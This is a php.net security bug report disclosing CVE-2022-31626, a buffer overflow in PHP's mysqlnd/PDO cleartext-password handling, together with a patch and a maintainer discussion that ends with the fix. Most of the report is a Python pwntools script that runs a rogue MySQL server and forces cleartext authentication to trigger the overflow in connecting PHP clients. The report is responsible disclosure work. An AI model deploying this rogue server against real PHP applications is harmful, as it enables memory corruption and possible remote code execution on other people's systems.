php.net |  support |  documentation |  report a bug |  advanced search |  search howto |  statistics |  random bug |  login
Sec Bug #81719 mysqlnd/pdo password buffer overflow leading to RCE
Submitted: 2022-05-16 14:33 UTC Modified: 2022-06-15 07:24 UTC
Votes:11
Avg. Score:3.0 ± 1.0
Reproduced:2 of 2 (100.0%)
Same Version:2 (100.0%)
Same OS:2 (100.0%)
From: c dot fol at ambionics dot io Assigned: cmb (profile)
Status: Closed Package: PDO MySQL
PHP Version: 8.1.6 OS:
Private report: No CVE-ID: 2022-31626
 [2022-05-16 14:33 UTC] c dot fol at ambionics dot io
Description:
------------
Hello PHP team!

# INFOS

There's a buffer overflow here:
https://github.com/php/php-src/blob/master/ext/mysqlnd/mysqlnd_wireprotocol.c#L785

It copies `auth_data_len` bytes from `buffer + MYSQLND_HEADER_SIZE`, but only allocates `auth_data_len` bytes.

This bug affects mysqlnd and therefore PDO.

For context, this function copies the user submitted password (`packet->auth_data`) to a buffer in order to send it to a MySQL server. This happens with the legacy auth method that requires you to send a password as raw instead of having some kind of challenge/response logic.

This is exploitable remotely by making PHP connect to a rogue MySQL server. Tools such as Adminer, PHPmyAdmin are affected. Impact is remote code execution.

# TEST SCRIPT

I've added a fake MySQL Server coded in python to demonstrate the bug at the bottom of this bug report. This should probably be removed before the bug goes public.


Install pwntools (https://github.com/Gallopsled/pwntools#readme), and start it. It'll wait for connections.
Then, you can start PHP in debug mode, with GDB and break on the indicated line:

```
$ gdb --args ./sapi/cli/php -r "new PDO('mysql:host=here.localhost', 'b', str_repeat('a',5000));"
(gdb) b mysqlnd_wireprotocol.c:785
(gdb) r
```

As it breaks, you'll see that the copy happens OOB.

# PATCH

Just add the size of the header in the computation.

```
- zend_uchar * const buffer = pfc->cmd_buffer.length >= packet->auth_data_len? pfc->cmd_buffer.buffer : mnd_emalloc(packet->auth_data_len);
+ size_t total_packet_size = packet->auth_data_len + MYSQLND_HEADER_SIZE;
+ zend_uchar * const buffer = pfc->cmd_buffer.length >= total_packet_size? pfc->cmd_buffer.buffer : mnd_emalloc(total_packet_size);
```

Best regards,
Charles Fol
ambionics.io


```
#!/usr/bin/env python3

from pwn import *


class ProtoError(Exception):
    def __init__(self):
        super().__init__('Unknown SQL command')


class Output:
    def clear(self):
        print('\r\x1b[K', end='')
        return self

    def __getattr__(self, x):
        def wrapper(msg='', *args, **kwargs):
            return print(msg.format(*args), **kwargs)
        return wrapper


out = Output()


def failure(message):
    out.error(message)
    exit()

def zend_string_size(s):
    """When you create a PHP string of N bytes, it will allocate N+25 bytes.
    """
    return s - 24 - 1


class Handler:
    """Handles a connection to the fake MySQL server.
    When the client auths, we change the authentication method to cleartext to
    trigger the overflow.
    Otherwise, once we receive a packet, we send back what the client wants to
    hear.
    """
    def __init__(self, socket):
        self.socket = socket
        self.handle()

    def die(self):
        self.socket.close()

    def handle(self):
        try:
            self.handle_handshake()
            while self.handle_command() != 'quit':
                pass
        except ProtoError:
            raise
        except EOFError:
            #out.failure('EOF')
            pass
        except Exception as e:
            #out.failure('{}: {:}', type(e).__name__, str(e))
            raise
        finally:
            self.socket.close()

    def handle_command(self):
        packet = self.read_packet()
        command = packet[0]

        # Send query
        if command == 0x03:
            self.handle_query(packet[1:])
            return
        # Change DB
        if command == 0x02:
            #out.info('Change DB: {}', packet[1:].decode())
            self.send('07 00 00 01 00 00 00 02 00 00 00')
            return
        if command == 0x1b:
            #out.info('Unknown packet')
            self.send('05 00 00 01 fe 00 00 02 00')
            return
        # Quit
        if command == 0x01:
            #out.info('Closing connection')
            return 'quit'

    def send(self, data):
        self.socket.send(bytes.fromhex(data.replace(' ', '')))

    def read_packet(self):
        packet_header = self.socket.recv(4)
        if len(packet_header) != 4:
            raise ProtoError()
        size = u32(packet_header) & 0xffffff
        contents = self.socket.recv(size)
        return contents

    def handle_handshake(self):
        #out.success('Got connection, authenticating...')
        self.send('4a0000000a382e302e3233009a0e000011686652356c700800ffffff0200ffcf150000000000000000000077315b77715b5315523a274e0063616368696e675f736861325f70617373776f726400')
        self.read_packet()
        self.send('020000020103')
        # switch auth to cleartext password (pam)
        self.send('16000003FE6d7973716c5f636c6561725f70617373776f726400')
        self.read_packet()
        self.read_packet()
        # The overflow :)
        self.socket.recv(4)
        self.send('0700000500000002000000')

    def handle_query(self, query):
        #out.info('Query: {}', query.decode())
        if query.startswith(b'SET '):
            self.send('07 00 00 01 00 00 00 02 00 00 00')
        elif query.startswith(b'SELECT TABLE_NAME, TABLE_TYPE'):
            self.send('0100000102480000020364656612696e666f726d6174696f6e5f736368656d61065441424c4553067461626c65730a5441424c455f4e414d450a5441424c455f4e414d450cff0000010000fd8110000000480000030364656612696e666f726d6174696f6e5f736368656d61065441424c4553067461626c65730a5441424c455f545950450a5441424c455f545950450cff002c000000fe811100000005000004fe000002000d00000501610a42415345205441424c451000000604746573740a42415345205441424c4505000007fe00000200')
        elif query.startswith(b'SELECT @@default_storage_engine'):
            self.send('01000001012e0000020364656600000018404064656661756c745f73746f726167655f656e67696e65000cff0054550100fd00001f000005000003fe000002000700000406496e6e6f444205000005fe00000200')
        elif query.startswith(b'SHOW COLLATION'):
            self.send('')
            self.send('')
        elif query.startswith(b'SHOW CREATE DATABASE'):
            self.send('01000001021e00000203646566000000084461746162617365000cff0000010000fd01001f000025000003036465660000000f437265617465204461746162617365000cff0000100000fd01001f000005000004fe000002008400000504746573747e43524541544520444154414241534520607465737460202f2a2134303130302044454641554c54204348415241435445522053455420757466386d623420434f4c4c41544520757466386d62345f303930305f61695f6369202a2f202f2a2138303031362044454641554c5420454e4352595054494f4e3d274e27202a2f05000006fe00000200')
        elif query.startswith(b'SELECT ROUTINE_NAME AS'):
            self.send('0100000104510000020364656612696e666f726d6174696f6e5f736368656d6108524f5554494e455308524f5554494e45530d53504543494649435f4e414d450c524f5554494e455f4e414d450cff0000010000fd0150000000500000030364656612696e666f726d6174696f6e5f736368656d6108524f5554494e455308524f5554494e45530c524f5554494e455f4e414d450c524f5554494e455f4e414d450cff0000010000fd0150000000500000040364656612696e666f726d6174696f6e5f736368656d6108524f5554494e455308524f5554494e45530c524f5554494e455f545950450c524f5554494e455f545950450cff0024000000fe815100000042000005036465660008524f5554494e455308524f5554494e45530e4454445f4944454e5449464945520e4454445f4944454e5449464945520cff00f4ffff0bfc80001f000005000006fe0000020005000007fe00000200')
        elif query.startswith(b'SHOW EVENTS'):
            self.send('010000010f280000020364656600064556454e545308736368656d6174610244620244620cff0000010000fd81100000002a0000030364656600064556454e5453066576656e7473044e616d65044e616d650cff0000010000fd0110000000300000040364656600064556454e5453066576656e747307446566696e657207446566696e65720cff0080040000fd8110000000340000050364656600064556454e5453066576656e74730954696d65207a6f6e650954696d65207a6f6e650cff0000010000fd8110000000240000060364656600064556454e545300045479706504547970650cff0024000000fd0100000000300000070364656600064556454e5453000a457865637574652061740a457865637574652061740c3f00130000000c8000000000380000080364656600064556454e5453000e496e74657276616c2076616c75650e496e74657276616c2076616c75650cff0000040000fd00000000003e0000090364656600064556454e5453066576656e74730e496e74657276616c206669656c640e496e74657276616c206669656c640cff0048000000fe80010000002800000a0364656600064556454e54530006537461727473065374617274730c3f00130000000c80000000002400000b0364656600064556454e54530004456e647304456e64730c3f00130000000c80000000002e00000c0364656600064556454e5453066576656e747306537461747573065374617475730cff0048000000fe81110000003600000d0364656600064556454e5453066576656e74730a4f726967696e61746f720a4f726967696e61746f720c3f000a0000000321100000005200000e0364656600064556454e54530e6368617261637465725f73657473146368617261637465725f7365745f636c69656e74146368617261637465725f7365745f636c69656e740cff0000010000fd01100000004e00000f0364656600064556454e54530a636f6c6c6174696f6e7314636f6c6c6174696f6e5f636f6e6e656374696f6e14636f6c6c6174696f6e5f636f6e6e656374696f6e0cff0000010000fd01100000004a0000100364656600064556454e54530a636f6c6c6174696f6e7312446174616261736520436f6c6c6174696f6e12446174616261736520436f6c6c6174696f6e0cff0000010000fd011000000005000011fe0000220005000012fe00002200')
        elif query.startswith(b'SELECT TABLE_NAME AS Name'):
            self.send('01000001033c0000020364656612696e666f726d6174696f6e5f736368656d61065441424c4553067461626c6573044e616d65044e616d650cff0000010000fd81100000003a0000030364656612696e666f726d6174696f6e5f736368656d61065441424c45530006456e67696e6506456e67696e650cff0000010000fd00000000003c0000040364656612696e666f726d6174696f6e5f736368656d61065441424c45530007436f6d6d656e7407436f6d6d656e740cff0000600000fc100000000005000005fe000002000a000006016106496e6e6f4442000d000007047465737406496e6e6f44420005000008fe00000200')
        elif query.startswith(b'SELECT /*+ MAX_'):
            self.send('01000001014e0000020364656612696e666f726d6174696f6e5f736368656d6108534348454d41544108736368656d6174610b534348454d415f4e414d450b534348454d415f4e414d450cff0000010000fd811000000005000003fe000022001300000412696e666f726d6174696f6e5f736368656d6106000005056d7973716c1300000612706572666f726d616e63655f736368656d61040000070373797305000008047465737405000009fe00002200')
        elif query.startswith(b'SHOW INDEX FROM `test`'):
            self.send('010000010f3500000203646566000f53484f575f53544154495354494353067461626c6573055461626c65055461626c650cff0000010000fd81100000003900000303646566000f53484f575f53544154495354494353000a4e6f6e5f756e697175650a4e6f6e5f756e697175650c3f00010000000301000000003500000403646566000f53484f575f5354415449535449435300084b65795f6e616d65084b65795f6e616d650cff0000010000fd00000000004f00000503646566000f53484f575f5354415449535449435312696e6465785f636f6c756d6e5f75736167650c5365715f696e5f696e6465780c5365715f696e5f696e6465780c3f000a0000000321100000003b00000603646566000f53484f575f53544154495354494353000b436f6c756d6e5f6e616d650b436f6c756d6e5f6e616d650cff0000010000fd00000000003700000703646566000f53484f575f535441544953544943530009436f6c6c6174696f6e09436f6c6c6174696f6e0cff0004000000fd00000000003b00000803646566000f53484f575f53544154495354494353000b43617264696e616c6974790b43617264696e616c6974790c3f00150000000800000000003500000903646566000f53484f575f5354415449535449435300085375625f70617274085375625f706172740c3f00150000000800000000001c00000a03646566000000065061636b6564000c3f00000000000680000000002d00000b03646566000f53484f575f5354415449535449435300044e756c6c044e756c6c0cff000c000000fd01000000003900000c03646566000f53484f575f53544154495354494353000a496e6465785f747970650a496e6465785f747970650cff002c000000fd81000000003300000d03646566000f53484f575f535441544953544943530007436f6d6d656e7407436f6d6d656e740cff0020000000fd01000000004600000e03646566000f53484f575f5354415449535449435307696e64657865730d496e6465785f636f6d6d656e740d496e6465785f636f6d6d656e740cff0000200000fd81100000003300000f03646566000f53484f575f53544154495354494353000756697369626c650756697369626c650cff000c000000fd01000000003900001003646566000f53484f575f53544154495354494353000a45787072657373696f6e0a45787072657373696f6e0cff00fffffffffc900000000005000011fe0000020005000012fe00000200')
        elif query.startswith(b'EXPLAIN PARTITIONS SELECT * FROM '):
            self.send('b2000001ff2804233432303030596f75206861766520616e206572726f7220696e20796f75722053514c2073796e7461783b20636865636b20746865206d616e75616c207468617420636f72726573706f6e647320746f20796f7572204d7953514c207365727665722076657273696f6e20666f72207468652072696768742073796e74617820746f20757365206e656172202753454c454354202a2046524f4d20746573742e7465737427206174206c696e652031')
        elif query.startswith(b'SELECT * FROM test.test'):
            self.handle_select_test()
        elif query.startswith(b'SHOW WARNINGS'):
            self.send('01000001031b00000203646566000000054c6576656c000cff001c000000fd01001f00001a0000030364656600000004436f6465000c3f000400000003a1000000001d00000403646566000000074d657373616765000cff0000080000fd01001f000005000005fe0000020005000006fe00000200')
        else:
            hexdump(query)
            raise ProtoError()


class SQLServer:
    """Rogue MySQL server.
    """
    session_class = None

    def __init__(self):
        self.sessions = []
        self.socket = server(3306, callback=self.accept)

    def accept(self, client_socket):
        self.sessions.append(
            self.session_class(client_socket)
        )
    
    def set_session_handler(self, session_class):
        self.session_class = session_class

    def stop(self):
        self.socket.close()
        for session in self.sessions:
            session.die()


server = SQLServer()
server.set_session_handler(Handler)

pause()
```


Patches

Add a Patch

Pull Requests

Add a Pull Request

History

AllCommentsChangesGit/SVN commitsRelated reports
 [2022-05-17 13:59 UTC] cmb@php.net
-Status: Open +Status: Verified -Assigned To: +Assigned To: cmb
 [2022-05-17 13:59 UTC] cmb@php.net
Thanks for reporting the issue (very thorough report)!  I can
reproduce the bug, and your patch would obviously solve that.

However, I'm having some issues with the server script, which
apparently stalls at the end of the handshake
(Handler.handle_handshake).  It would be nice to commit that as
regression test, though (and also as the beginning of a more
general fake server test suite); maybe you have an idea how to fix
that.

Anyway, as I understand it, this issue would only happen for
*very* long passwords (~ 5000 bytes or more); that would likely
*not* qualify this as security issue.  Or are there other more
likely cases which may trigger this bug?
 [2022-05-25 21:34 UTC] stas@php.net
-CVE-ID: +CVE-ID: needed
 [2022-05-25 21:34 UTC] stas@php.net
I think since it can be common for a hosted tool to accept user-supplied password, and as required length is not ridiculous (5k, not gigabytes) we should treat it as security.
 [2022-05-25 21:40 UTC] stas@php.net
-CVE-ID: needed +CVE-ID: 2022-31626
 [2022-05-31 13:43 UTC] c dot fol at ambionics dot io
Hello cmb,

Sorry for the delay, it looks like your tracker refuses to send me emails for this bug (although it works fine, usually). Have you made any progress regarding the server ?
I implemented this server a long time ago, so I don't really remember. I might be able to have a look next week if you're still stuck.

Regards
 [2022-06-07 10:27 UTC] cmb@php.net
> Have you made any progress regarding the server ?

No, I didn't work further on that.  I think the problem is that
the test would always hang, but it was sufficient to trigger the
buffer overflow.  Now that the bug is fixed, the test would need
to proceed.
 [2022-06-15 07:24 UTC] stas@php.net
-Status: Verified +Status: Closed
 [2022-06-15 07:24 UTC] stas@php.net
The fix for this bug has been committed.
If you are still experiencing this bug, try to check out latest source from https://github.com/php/php-src and re-test.
Thank you for the report, and for helping us make PHP better.


 
PHP Copyright © 2001-2022 The PHP Group
All rights reserved.
Last updated: Wed Aug 10 16:03:35 2022 UTC